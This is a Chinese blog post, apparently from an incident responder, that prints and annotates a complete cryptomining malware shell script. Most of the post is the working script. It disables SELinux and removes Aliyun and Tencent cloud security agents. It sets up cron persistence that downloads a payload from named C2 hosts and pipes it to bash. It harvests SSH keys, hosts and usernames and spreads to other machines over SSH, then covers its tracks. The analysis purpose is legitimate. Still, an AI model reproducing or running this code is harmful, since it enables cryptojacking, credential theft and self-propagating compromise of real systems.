在线咨询
内容搜索

挖矿脚本学习

发布时间:2025-12-09 11:50:06 浏览次数:2

背景

日常应急响应过程中发现的挖矿脚本,对其进行分析发现写的质量该不错,可以学习下

样本分析及学习

SHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/bin#关闭SElinuxsetenforce 0 2>/dev/null#将用户进程限制改为5000个ulimit -u 50000#临时修该 vm.nr_hugepages参数sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))#跟据pid来干掉下面的端口运行的进程netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s//.*//g" | xargs kill -9netstat -antp | grep '23.94.24.12:8080'  | awk '{print $7}' | sed -e 's//.*//g' | xargs kill -9netstat -antp | grep '134.122.17.13:8080'  | awk '{print $7}' | sed -e 's//.*//g' | xargs kill -9netstat -antp | grep '107.189.11.170:443'  | awk '{print $7}' | sed -e 's//.*//g' | xargs kill -9#生成两个随机数rand=$(seq 0 255 | sort -R | head -n1)rand2=$(seq 0 255 | sort -R | head -n1)#将下面文件的保护机制去掉,使其可删改chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down#卸载阿里云的安骑士if ps aux | grep -i '[a]liyun'; then  (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh  (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh  pkill aliyun-service  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service  rm -rf /usr/local/aegis*#关闭aliyun的服务  systemctl stop aliyun.service  systemctl disable aliyun.service#干掉某云agent监控  service bcm-agent stop  yum remove bcm-agent -y  apt-get remove bcm-agent -y#干掉腾讯云的云镜elif ps aux | grep -i '[y]unjing'; then  /usr/local/qcloud/stargate/admin/uninstall.sh  /usr/local/qcloud/YunJing/uninst.sh  /usr/local/qcloud/monitor/barad/admin/uninstall.shfisleep 1echo "DER Uninstalled"#改变文件/tmp/dbused属性(a:让文件或目录仅供附加用途、i:不得任意更动文件或目录)chattr -ai /tmp/dbused#利用ifconfig和ip a找到B段,给range变量if [ -s /usr/bin/ifconfig ];thenrange=$(ifconfig | grep "BROADCAST|inet" | grep -oP 'inets+Kd{1,3}.d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)elserange=$(ip a | grep "BROADCAST|inet" | grep -oP 'inets+Kd{1,3}.d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)fi#测试矿池dns是否能解析pool.supportxmr.comif [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];then        dns=""else        dns="-d"fi#测试矿池dns是否解析 bash.givemexyz.in,不能解析直接将url赋值为c2的地址if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];then        url="http://bash.givemexyz.in"else        url="http://209.141.40.190"fi#写入计划任务: 使用-e参数:激活转义字符#前三个是吸入系统计划任务#第四个是写入个人计划任务#写入计划任务的内容就是以curl、wget、python的urllib2库 来下载挖矿样本到/tmp/xms,并以bash来执行下载的挖矿样本。之后再删除下载的挖矿样本/tmp/xmsecho -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /etc/cron.d/rootecho -e "*/2 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /etc/cron.d/apacheecho -e "*/3 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /etc/cron.d/nginxecho -e "*/30 * * * *(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho -e "* * * * *(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xmsn##" > /var/spool/cron/crontabs/root#放入etc/cron.hourly的脚本会每小时执行一次,写入计划任务,并给有可执行权限mkdir -p /etc/cron.hourlyecho "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1DIR="/tmp"cd $DIRif [ -a "/tmp/dbused" ]then    if [ -w "/tmp/dbused" ] && [ ! -d "/tmp/dbused" ] #abused文件存在且可写,并且不是一个目录    then        if [ -x "$(command -v md5sum)" ] #查看是否有md计算命令 md5sum        then            sum=$(md5sum /tmp/dbused | awk '{ print $1 }') #计算abused的md5至            echo $sum            case $sum in                dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)                    echo "x86_64 OK"                ;;                *)                    echo "x86_64 wrong"                    rm -rf /usr/local/lib/libkk.so                    echo "" > /etc/ld.so.preload                    pkill -f wc.conf                    pkill -f susss                    sleep 4                ;;            esac        fi        echo "P OK"    else        DIR=$(mktemp -d)/tmp        mkdir $DIR        echo "T DIR $DIR"    fielse #没有dbused文件    if [ -d "/tmp" ]    then        DIR="/tmp"    fi    echo "P NOT EXISTS"fiif [ -d "/tmp/.sh/dbused" ]then    DIR=$(mktemp -d)/tmp    mkdir $DIR    echo "T DIR $DIR"fi#删除系统上的$2文件,用网上下载的$1文件替换#get函数定义get() {  chattr -i $2; rm -rf $2  wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 ||  lwp-download $1 $2 ||  chmod +x $2}#检查dbused是否存在,存在的话就计算md5来校验下,不存在就去下载downloadIfNeed(){    if [ -x "$(command -v md5sum)" ]    then        if [ ! -f $DIR/dbused ]; then            echo "File not found!"            download        fi        sum=$(md5sum $DIR/dbused | awk '{ print $1 }')        echo $sum        case $sum in            dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)                echo "x86_64 OK"            ;;            *)                echo "x86_64 wrong"                sizeBefore=$(du $DIR/x86_64)                if [ -s /usr/bin/curl ];                then                    WGET="curl -k -o ";                fi                if [ -s /usr/bin/wget ];                then                    WGET="wget --no-check-certificate -O ";                fi                download                sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')                if [ -s /usr/bin/curl ];                then                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt                fi            ;;        esac    else        echo "No md5sum"        download    fi}#download函数定义,验证md5不存在调用download2下载download() {    if [ -x "$(command -v md5sum)" ]    then        sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')        echo $sum        case $sum in            dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)                echo "x86_64 OK"                cp $DIR/x86_643 $DIR/x86_64        cp $DIR/x86_643 $DIR/x86_64            ;;            *)                echo "x86_64 wrong"                download2            ;;        esac    else        echo "No md5sum"        download2    fi}#调用get函数进行下载download2() {get $url/$(uname -m) "$DIR"/dbused    if [ -x "$(command -v md5sum)" ]    then        sum=$(md5sum $DIR/dbused | awk '{ print $1 }')        echo $sum        case $sum in            dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)                echo "x86_64 OK"                cp $DIR/x86_64 $DIR/x86_643            ;;            *)                echo "x86_64 wrong"            ;;        esac    else        echo "No md5sum"    fi}judge() {    if [ ! "$(netstat -ant|grep '212.114.52.24:8080|194.5.249.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];    then        get $url/$(uname -m) "$DIR"/dbused        chmod +x "$DIR"/dbused        "$DIR"/dbused -c $dns        "$DIR"/dbused -pwn        sleep 5    elseecho "Running"    fi}if [ ! "$(netstat -ant|grep '212.114.52.24:8080|194.5.249.24:8080'|grep 'LISTEN|ESTABLISHED|TIME_WAIT'|grep -v grep)" ];then    judgeelse     echo "Running"fiif [ ! "$(netstat -ant|grep '104.168.71.132:80'|grep 'ESTABLISHED'|grep -v grep)" ];then    get $url/bashirc.$(uname -m) "$DIR"/bashirc    chmod 777 "$DIR"/bashirc    "$DIR"/bashircelseecho "Running"fi#检查计划任务,如不存在则重新建立if crontab -l | grep -q "$url"then    echo "Cron exists"else    crontab -r    echo "Cron not found"    echo "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" | crontab -fi#或取本机器密钥KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)#获取机器记录的hostHOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}")HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}" | uniq)#获取机器记录的user名USERZ=$(    echo "root"    find ~/ /root /home -maxdepth 2 -name '.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v ".ssh")#将以上信息加入list方便后面调用userlist=$(echo $USERZ | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-)hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-)keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-)for user in $userlist; do    for host in $hostlist; do        for key in $keylist; do            chmod +r $key; chmod 400 $key            #使用密钥登录直接执行后面的命令            ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms"        done    donedone#恢复环境,删除相关的痕迹并将之前相关系统文件的权限加上rm -rf "$DIR"/2start.jpgrm -rf "$DIR"/xmichattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down

154404.html

挖矿脚本
上一篇:QQ群关系可视化3D查询搭建[通俗易懂] 下一篇:JavaFX 类 ProgressIndicator实例讲解
需要做网站?需要网络推广?欢迎咨询客户经理 13272073477

免责声明:本站内容(文字信息+图片素材)来源于互联网公开数据整理或转载,仅用于学习参考,如有侵权问题,请及时联系本站删除,我们将在5个工作日内处理。联系邮箱:303555158#qq.com(把#换成@)

Copyright © 格特瑞商务咨询-贵州做网站公司 版权所有 | 黔ICP备19002813号-1